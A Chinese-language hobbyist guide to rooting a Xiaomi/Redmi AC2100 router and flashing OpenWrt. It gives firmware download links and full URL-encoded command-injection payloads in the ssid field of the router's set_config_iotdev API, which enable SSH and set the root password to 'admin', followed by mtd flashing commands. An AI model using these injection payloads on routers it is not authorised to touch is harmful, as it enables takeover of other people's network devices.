文章目录

• 一、入侵后台
• • 1、升级到2.0.722版本
  • 2、破解后台及密码
• 刷入版本

一、入侵后台

1、升级到2.0.722版本

版本下载地址

红米RM2100：http://cdnbj1.fds.api.mi-img/xiaoqiang/rom/rm2100/miwifi_rm2100_firmware_d6234_2.0.7.bin
小米R2100：http://cdnbj1.fds.api.mi-img/xiaoqiang/rom/r2100/miwifi_r2100_firmware_4b519_2.0.722.bin

2、破解后台及密码

浏览器登录首页192.168.31.1，网址会自动跳转到形如

http://192.168.31.1/cgi-bin/luci/;stok=191d7db25f712df732ccbfafe4442021/web/home#router

的url里，上述网址中191d7db25f712df732ccbfafe4442021是stok变量，以下用<STOK>表示stok变量。
在浏览器地址栏中输入以下链接代码打开后台入口，注意替换掉<STOK>部分：

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20’s%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg’%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

如本例应当是http://192.168.31.1/cgi-bin/luci/;stok=191d7db25f712df732ccbfafe4442021/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20’s%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg’%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B

返回{“code”:0}即代表成功

在浏览器地址栏中输入以下链接代码修改root用户登录密码为admin，注意替换掉<STOK>部分：

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20’admin%5Cnadmin’%20%7C%20passwd%20root%3B

返回{“code”:0}即代表成功

上述流程完毕后可ssh登录路由器后台：192.168.31.1:22

刷入版本

把openwrt的两个rom文件（xxx-kernel1.bin和xxx-rootfs0.bin）上传到路由器tmp目录。然后输入如下命令

nvram set uart_en=1&&nvram set bootdelay=5&&nvram set flag_try_sys1_failed=1&&nvram commit
mtd write /tmp/openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-squashfs-kernel1.bin kernel1
mtd -r write /tmp/openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-squashfs-rootfs0.bin rootfs0